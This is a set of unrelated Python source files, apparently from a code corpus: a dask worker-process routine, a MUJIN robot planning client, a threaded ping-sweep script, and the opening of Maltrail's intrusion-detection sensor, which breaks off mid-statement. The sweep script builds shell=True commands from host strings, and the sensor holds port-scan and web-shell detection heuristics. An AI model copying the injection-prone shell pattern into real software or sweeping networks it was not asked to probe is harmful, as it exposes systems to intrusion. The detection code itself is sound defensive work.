'timeout': max(0, deadline - loop.time()) * 0.8,
'executor_wait': executor_wait,
})
while process.is_alive() and loop.time() < deadline:
yield gen.sleep(0.05)
if process.is_alive():
logger.warning("Worker process still alive after %d seconds, killing",
timeout)
try:
yield process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
@gen.coroutine
def _wait_until_started(self):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
assert msg == 'started', msg
return
except Empty:
yield gen.sleep(delay)
continue
@gen.coroutine
def _wait_until_connected(self):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
yield gen.sleep(delay)
continue
if isinstance(msg, Exception):
logger.error("Failed while trying to start worker process",
exc_info=True)
yield self.process.join()
raise msg
else:
raise gen.Return(msg)
@classmethod
def _run(cls, worker_args, worker_kwargs, worker_start_args,
silence_logs, init_result_q, child_stop_q): # pragma: no cover
from distributed import Worker
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(*worker_args, **worker_kwargs)
@gen.coroutine
def do_stop(timeout=5, executor_wait=True):
try:
yield worker._close(report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
assert msg.pop('op') == 'stop'
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
@gen.coroutine
def run():
"""
Try to start worker and inform parent of outcome.
"""
init_result_q.put('started')
try:
yield worker._start(*worker_start_args)
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put(e)
else:
assert worker.address
init_result_q.put({'address': worker.address,
'dir': worker.local_dir})
yield worker.wait_until_closed()
logger.info("Worker closed")
try:
loop.run_sync(run)
except TimeoutError:
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
|
planningclient.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2016 MUJIN Inc
"""
Planning client
"""
# System imports
import threading
import weakref
import os
import time
# Mujin imports
from . import APIServerError, GetMonotonicTime
from . import controllerclientbase, zmqclient
from . import zmq
# Logging
import logging
log = logging.getLogger(__name__)
def GetAPIServerErrorFromZMQ(response):
"""If response is an error, return the APIServerError instantiated from the response's error field. Otherwise return None
"""
if response is None:
return None
if 'error' in response:
if isinstance(response['error'], dict):
return APIServerError(response['error']['description'], response['error']['errorcode'], response['error'].get('inputcommand',None), response['error'].get('detailInfoType',None), response['error'].get('detailInfo',None))
else:
return APIServerError(response['error'])
elif 'exception' in response:
return APIServerError(response['exception'])
elif 'status' in response and response['status'] != 'succeeded':
# something happened so raise exception
return APIServerError(u'Resulting status is %s' % response['status'])
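# A hypothetical usage sketch: convert a zmq reply into an exception and raise it.
#   err = GetAPIServerErrorFromZMQ(response)
#   if err is not None:
#       raise err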
class PlanningControllerClient(controllerclientbase.ControllerClient):
"""Mujin controller client for planning tasks
"""
_usewebapi = True # if True use the HTTP webapi, otherwise the zeromq webapi (internal use only)
_sceneparams = None
scenepk = None # The scenepk this controller is configured for
_ctx = None # zmq context shared among all clients
_ctxown = None # zmq context owned by this class
_isok = False # If False, client is about to be destroyed
_heartbeatthread = None # Thread for monitoring controller heartbeat
_isokheartbeat = False # If False, then stop heartbeat monitor
_taskstate = None # Latest task status from heartbeat message
_commandsocket = None # zmq client to the command port
_configsocket = None # zmq client to the config port
def __init__(self, taskzmqport, taskheartbeatport, taskheartbeattimeout, tasktype, scenepk, usewebapi=True, ctx=None, slaverequestid=None, **kwargs):
"""Logs into the mujin controller and initializes the task's zmq connection
:param taskzmqport: Port of the task's zmq server, e.g. 7110
:param taskheartbeatport: Port of the task's zmq server's heartbeat publisher, e.g. 7111
:param taskheartbeattimeout: Seconds until reinitializing task's zmq server if no heartbeat is received, e.g. 7
:param tasktype: Type of the task
:param scenepk: Primary key (pk) of the bin picking task scene, e.g. irex2013.mujin.dae
"""
super(PlanningControllerClient, self).__init__(**kwargs)
self._slaverequestid = slaverequestid
self._sceneparams = {}
self._isok = True
# Task
self.tasktype = tasktype
self._usewebapi = usewebapi
# Connects to task's zmq server
self._commandsocket = None
self._configsocket = None
if taskzmqport is not None:
if ctx is None:
self._ctx = zmq.Context()
self._ctxown = self._ctx
else:
self._ctx = ctx
self.taskzmqport = taskzmqport
            self._commandsocket = zmqclient.ZmqClient(self.controllerIp, taskzmqport, self._ctx)  # use the stored context so an internally created one is honored
            self._configsocket = zmqclient.ZmqClient(self.controllerIp, taskzmqport + 2, self._ctx)
self.taskheartbeatport = taskheartbeatport
self.taskheartbeattimeout = taskheartbeattimeout
if self.taskheartbeatport is not None:
self._isokheartbeat = True
self._heartbeatthread = threading.Thread(target=weakref.proxy(self)._RunHeartbeatMonitorThread)
self._heartbeatthread.start()
self.SetScenePrimaryKey(scenepk)
def __del__(self):
self.Destroy()
def Destroy(self):
self.SetDestroy()
if self._heartbeatthread is not None:
self._isokheartbeat = False
self._heartbeatthread.join()
self._heartbeatthread = None
if self._commandsocket is not None:
self._commandsocket.Destroy()
self._commandsocket = None
if self._configsocket is not None:
self._configsocket.Destroy()
self._configsocket = None
if self._ctxown is not None:
try:
self._ctxown.destroy()
except Exception:
pass
self._ctxown = None
super(PlanningControllerClient, self).Destroy()
def SetDestroy(self):
self._isok = False
self._isokheartbeat = False
commandsocket = self._commandsocket
if commandsocket is not None:
commandsocket.SetDestroy()
configsocket = self._configsocket
if configsocket is not None:
configsocket.SetDestroy()
super(PlanningControllerClient, self).SetDestroy()
def GetSlaveRequestId(self):
return self._slaverequestid
def GetCommandSocketRaw(self):
return self._commandsocket
def DeleteJobs(self, usewebapi=True, timeout=5):
"""Cancels all jobs
"""
if usewebapi:
super(PlanningControllerClient, self).DeleteJobs(usewebapi, timeout)
else:
            # Cancel via the zmq config socket
if self._configsocket is not None:
self._SendConfigViaZMQ({'command': 'cancel'}, slaverequestid=self._slaverequestid, timeout=timeout, fireandforget=False)
def _RunHeartbeatMonitorThread(self, reinitializetimeout=10.0):
while self._isok and self._isokheartbeat:
log.info(u'subscribing to %s:%s' % (self.controllerIp, self.taskheartbeatport))
socket = self._ctx.socket(zmq.SUB)
socket.setsockopt(zmq.TCP_KEEPALIVE, 1) # turn on tcp keepalive, do these configuration before connect
socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 2) # the interval between the last data packet sent (simple ACKs are not considered data) and the first keepalive probe; after the connection is marked to need keepalive, this counter is not used any further
socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 2) # the interval between subsequential keepalive probes, regardless of what the connection has exchanged in the meantime
socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 2) # the number of unacknowledged probes to send before considering the connection dead and notifying the application layer
socket.connect('tcp://%s:%s' % (self.controllerIp, self.taskheartbeatport))
socket.setsockopt(zmq.SUBSCRIBE, '')
poller = zmq.Poller()
poller.register(socket, zmq.POLLIN)
lastheartbeatts = GetMonotonicTime()
while self._isokheartbeat and GetMonotonicTime() - lastheartbeatts < reinitializetimeout:
socks = dict(poller.poll(50))
if socket in socks and socks.get(socket) == zmq.POLLIN:
try:
reply = socket.recv_json(zmq.NOBLOCK)
if 'slavestates' in reply:
self._taskstate = reply.get('slavestates', {}).get('slaverequestid-%s'%self._slaverequestid, None)
lastheartbeatts = GetMonotonicTime()
else:
self._taskstate = None
except zmq.ZMQError as e:
log.exception('failed to receive from publisher: %s', e)
if self._isokheartbeat:
log.warn('%f secs since last heartbeat from controller' % (GetMonotonicTime() - lastheartbeatts))
def GetPublishedTaskState(self):
"""Return most recent published state. If publishing is disabled, then will return None
"""
if self._heartbeatthread is None or not self._isokheartbeat:
            log.warn('heartbeat thread is not running (taskheartbeatport=%s), so the returned task state may be stale', self.taskheartbeatport)
return self._taskstate
def SetScenePrimaryKey(self, scenepk):
self.scenepk = scenepk
sceneuri = controllerclientbase.GetURIFromPrimaryKey(scenepk)
        # For now (HACK) we need to set the correct scenefilename. Newer versions of the mujin controller need only scenepk, so scenefilename should eventually be removed.
mujinpath = os.path.join(os.environ.get('MUJIN_MEDIA_ROOT_DIR', '/var/www/media/u'), self.controllerusername)
scenefilename = controllerclientbase.GetFilenameFromURI(sceneuri, mujinpath)[1]
self._sceneparams = {'scenetype': 'mujin', 'sceneuri': sceneuri, 'scenefilename': scenefilename, 'scale': [1.0, 1.0, 1.0]} # TODO: set scenetype according to the scene
#
# Tasks related
#
def RunSceneTaskAsync(self, scenepk, taskpk, slaverequestid=None, fields=None, usewebapi=True, timeout=5):
"""
:return: {'jobpk': 'xxx', 'msg': 'xxx'}
Notice: This overwrites the base in controllerclientbase, to accept slaverequestid.
"""
assert(usewebapi)
if slaverequestid is None:
slaverequestid = self._slaverequestid
data = {
'scenepk': scenepk,
'target_pk': taskpk,
'resource_type': 'task',
'slaverequestid': slaverequestid,
}
return self._webclient.APICall('POST', u'job/', data=data, expectedStatusCode=200, timeout=timeout)
def ExecuteTaskSync(self, scenepk, tasktype, taskparameters, slaverequestid='', timeout=None):
        """Executes a task of a particular task type without creating a new task resource
        :param taskparameters: A dictionary with values such as: targetname, destinationname, robot, command, manipname, returntostart, samplingtime
        :param slaverequestid: Id of the planning slave that should execute the command
        :param timeout: Timeout in seconds for the web api call
        """
# Execute task
try:
return self._webclient.APICall('GET', u'scene/%s/resultget' % (scenepk), data={
'tasktype': tasktype,
'taskparameters': taskparameters,
'slaverequestid': slaverequestid,
'timeout': timeout,
}, timeout=timeout)
except Exception as e:
import traceback
            log.warn('Failed to execute sync command through webstack, exception was %s; perhaps the planning server or planning slave is not responding, or another sync command is already running? scenepk=%r, tasktype=%r, taskparameters=%r, slaverequestid=%r. Coming from:\n%s', e, scenepk, tasktype, taskparameters, slaverequestid, ''.join(traceback.format_stack()))
raise
def _ExecuteCommandViaWebAPI(self, taskparameters, slaverequestid='', timeout=None):
"""Executes command via web api
"""
return self.ExecuteTaskSync(self.scenepk, self.tasktype, taskparameters, slaverequestid=slaverequestid, timeout=timeout)
def _ExecuteCommandViaZMQ(self, taskparameters, slaverequestid='', timeout=None, fireandforget=None, checkpreempt=True, respawnopts=None):
command = {
'fnname': 'RunCommand',
'taskparams': {
'tasktype': self.tasktype,
'sceneparams': self._sceneparams,
'taskparameters': taskparameters,
},
'userinfo': self._userinfo,
'slaverequestid': slaverequestid,
'stamp': time.time(),
'respawnopts': respawnopts,
}
if self.tasktype == 'binpicking':
command['fnname'] = '%s.%s' % (self.tasktype, command['fnname'])
response = self._commandsocket.SendCommand(command, timeout=timeout, fireandforget=fireandforget, checkpreempt=checkpreempt)
if fireandforget:
# For fire and forget commands, no response will be available
return None
error = GetAPIServerErrorFromZMQ(response)
if error is not None:
log.warn('GetAPIServerErrorFromZMQ returned error for %r', response)
raise error
if response is None:
log.warn(u'got no response from task %r', taskparameters)
return None
return response['output']
def ExecuteCommand(self, taskparameters, usewebapi=None, slaverequestid=None, timeout=None, fireandforget=None, respawnopts=None):
"""Executes command with taskparameters
:param taskparameters: Task parameters in json format
:param timeout: Timeout in seconds for web api call
:param fireandforget: Whether we should return immediately after sending the command
:return: Server response in json format
"""
if 'stamp' not in taskparameters:
taskparameters['stamp'] = time.time()
# log.debug('Executing task with parameters: %r', taskparameters)
if slaverequestid is None:
slaverequestid = self._slaverequestid
if usewebapi is None:
usewebapi = self._usewebapi
if usewebapi:
return self._ExecuteCommandViaWebAPI(taskparameters, timeout=timeout, slaverequestid=slaverequestid)
else:
return self._ExecuteCommandViaZMQ(taskparameters, timeout=timeout, slaverequestid=slaverequestid, fireandforget=fireandforget, respawnopts=respawnopts)
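    # Editor's note -- example dispatch (taskparameters contents are hypothetical):
    #
    #     client.ExecuteCommand({'command': 'GetState'}, usewebapi=False, timeout=10)
    #
    # goes through _ExecuteCommandViaZMQ because usewebapi is explicitly False;
    # leaving usewebapi=None falls back to the client-wide _usewebapi default.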
#
# Config
#
def Configure(self, configuration, usewebapi=None, timeout=None, fireandforget=None):
configuration['command'] = 'configure'
return self.SendConfig(configuration, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def SetLogLevel(self, componentLevels, fireandforget=None, timeout=5):
"""Set webstack and planning log level
:param componentLevels: Mapping from component name to level name, for example {"some.specific.component": "DEBUG"}
If component name is empty string, it sets the root logger
If level name is empty string, it unsets the level previously set
"""
super(PlanningControllerClient, self).SetLogLevel(componentLevels, timeout=timeout)
configuration = {
'command': 'setloglevel',
'componentLevels': componentLevels
}
return self.SendConfig(configuration, timeout=timeout, fireandforget=fireandforget)
def SendConfig(self, command, usewebapi=None, slaverequestid=None, timeout=None, fireandforget=None):
# log.debug('Send config: %r', command)
if slaverequestid is None:
slaverequestid = self._slaverequestid
return self._SendConfigViaZMQ(command, slaverequestid=slaverequestid, timeout=timeout, fireandforget=fireandforget)
def _SendConfigViaZMQ(self, command, slaverequestid='', timeout=None, fireandforget=None, checkpreempt=True):
command['slaverequestid'] = slaverequestid
response = self._configsocket.SendCommand(command, timeout=timeout, fireandforget=fireandforget, checkpreempt=checkpreempt)
if fireandforget:
# For fire and forget commands, no response will be available
return None
error = GetAPIServerErrorFromZMQ(response)
if error is not None:
raise error
return response['output']
#
# Viewer Parameters Related
#
def SetViewerFromParameters(self, viewerparameters, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewerparameters.update(kwargs)
return self.Configure({'viewerparameters': viewerparameters}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
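    # Editor's note -- example (the parameter names here are hypothetical):
    #
    #     client.SetViewerFromParameters({'renderwidth': 1280, 'renderheight': 720})
    #
    # is shorthand for Configure({'viewerparameters': {...}}); with the default
    # fireandforget=True no response is returned.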
def MoveCameraZoomOut(self, zoommult=0.9, zoomdelta=20, usewebapi=False, timeout=10, fireandforget=True, ispan=True, **kwargs):
viewercommand = {
'command': 'MoveCameraZoomOut',
'zoomdelta': float(zoomdelta),
'zoommult': float(zoommult),
'ispan': bool(ispan)
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraZoomIn(self, zoommult=0.9, zoomdelta=20, usewebapi=False, timeout=10, fireandforget=True, ispan=True, **kwargs):
viewercommand = {
'command': 'MoveCameraZoomIn',
'zoomdelta': float(zoomdelta),
'zoommult': float(zoommult),
'ispan': bool(ispan)
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraLeft(self, ispan=True, panangle=5.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraLeft',
'pandelta': float(pandelta),
'panangle': float(panangle),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraRight(self, ispan=True, panangle=5.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraRight',
'pandelta': float(pandelta),
'panangle': float(panangle),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraUp(self, ispan=True, angledelta=3.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraUp',
'pandelta': float(pandelta),
'angledelta': float(angledelta),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraDown(self, ispan=True, angledelta=3.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraDown',
'pandelta': float(pandelta),
'angledelta': float(angledelta),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraPointOfView(self, pointOfViewName, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
"""
Sends a command that moves the camera to one of the following point of view names:
+x, -x, +y, -y, +z, -z.
For each point of view, the camera will be aligned to the scene's bounding box center, and the whole scene will be visible. The camera will look at the
scene from the opposite direction of the point of view's name's axis (for instance, the camera placed at +x will look at the scene from the -x direction).
"""
viewercommand = {
'command': 'MoveCameraPointOfView',
'axis': pointOfViewName,
}
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def SetCameraTransform(self, pose=None, transform=None, distanceToFocus=0.0, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
"""Sets the camera transform
:param transform: 4x4 matrix
"""
viewercommand = {
'command': 'SetCameraTransform',
'distanceToFocus': float(distanceToFocus),
}
if transform is not None:
viewercommand['transform'] = [list(row) for row in transform]
if pose is not None:
viewercommand['pose'] = [float(f) for f in pose]
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def StartIPython(self, timeout=1, usewebapi=False, fireandforget=True, **kwargs):
configuration = {'startipython': True}
configuration.update(kwargs)
return self.Configure(configuration, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)
|
mtping3.py
|
import subprocess
import threading
class Ping:
def __init__(self, host):
self.host = host
def __call__(self):
        result = subprocess.run(
            'ping -c2 %s > /dev/null 2>&1' % self.host,  # POSIX-sh safe redirection; bash's '&>' would background the command under /bin/sh and always return 0
            shell=True
        )
if result.returncode == 0:
print('%s:up' % self.host)
else:
print('%s:down' % self.host)
if __name__ == '__main__':
ips = ('172.40.59.%s' % i for i in range(1, 255))
for ip in ips:
        t = threading.Thread(target=Ping(ip))  # create a callable Ping instance for this host
        t.start()  # the thread invokes the instance, i.e. Ping.__call__()
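# Editor's sketch: a bounded-concurrency variant of the loop above using
# concurrent.futures (max_workers and the prefix are assumptions, not taken
# from the original script).
def ping_all_bounded(prefix='172.40.59.', max_workers=50):  # not called above
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        for i in range(1, 255):
            pool.submit(Ping(prefix + str(i)))  # Ping instances are callable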
|
sensor.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
from core.addr import inet_ntoa6
from core.addr import addr_port
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import flush_condensed_events
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import LOCAL_SUBDOMAIN_LOOKUPS
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import INFECTION_SCANNING_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import POTENTIAL_INFECTION_PORTS
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DIRECT_IP_URL_REGEX
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_RESULT_CACHE_ENTRIES)
_local_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if IS_WIN:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy')" % ('3' if six.PY3 else '2')
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
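# Editor's note -- worked example: the walk above strips one leading label per
# step, so a trail entry for a registered domain also matches its subdomains.
def _example_check_domain_member():  # illustrative only; never called
    assert _check_domain_member("cdn.EVIL.example.com", {"evil.example.com"}) is True
    assert _check_domain_member("example.com", {"evil.example.com"}) is False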
def _check_domain_whitelisted(query):
result = _result_cache.get((CACHE_TYPE.DOMAIN_WHITELISTED, query))
if result is None:
result = _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
_result_cache[(CACHE_TYPE.DOMAIN_WHITELISTED, query)] = result
return result
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get((CACHE_TYPE.DOMAIN, query)) == False:
return
result = False
if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
parts = query.split('.')
if trails._regex:
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
trail = trail.replace(".)", ").")
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
elif query.endswith(".ip-adress.com"): # Reference: https://www.virustotal.com/gui/domain/ip-adress.com/relations
_ = '.'.join(parts[:-2])
trail = "%s(.ip-adress.com)" % _
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _get_local_prefix():
_sources = set(_.split('~')[0] for _ in _connect_src_dst.keys())
_candidates = [re.sub(r"\d+\.\d+\Z", "", _) for _ in _sources]
_ = sorted(((_candidates.count(_), _) for _ in set(_candidates)), reverse=True)
result = _[0][1] if _ else ""
if result:
_result_cache[(CACHE_TYPE.LOCAL_PREFIX, "")] = result
else:
result = _result_cache.get((CACHE_TYPE.LOCAL_PREFIX, ""))
return result or '_'
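# Editor's note -- worked example (hypothetical addresses): with keys such as
# "192.168.1.5~x" and "192.168.2.7~y" in _connect_src_dst, stripping the last
# two octets yields the candidate "192.168." twice, so "192.168." is returned
# as the local prefix (and cached for periods with no tracked connections).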
def _process_packet(packet, sec, usec, ip_offset):
"""
    Processes a single (raw) IP-layer packet
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
_src_ip, _dst = key.split('~')
if not _dst.isdigit() and len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
if not check_whitelisted(_src_ip):
_dst_ip = _dst
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
elif len(_connect_src_dst[key]) > INFECTION_SCANNING_THRESHOLD:
_dst_port = _dst
_dst_ip = [_[-1] for _ in _connect_src_details[key]]
_src_port = [_[-2] for _ in _connect_src_details[key]]
if len(_dst_ip) == len(set(_dst_ip)):
if _src_ip.startswith(_get_local_prefix()):
log_event((sec, usec, _src_ip, _src_port[0], _dst_ip[0], _dst_port, PROTO.TCP, TRAIL.PORT, _dst_port, "potential infection", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
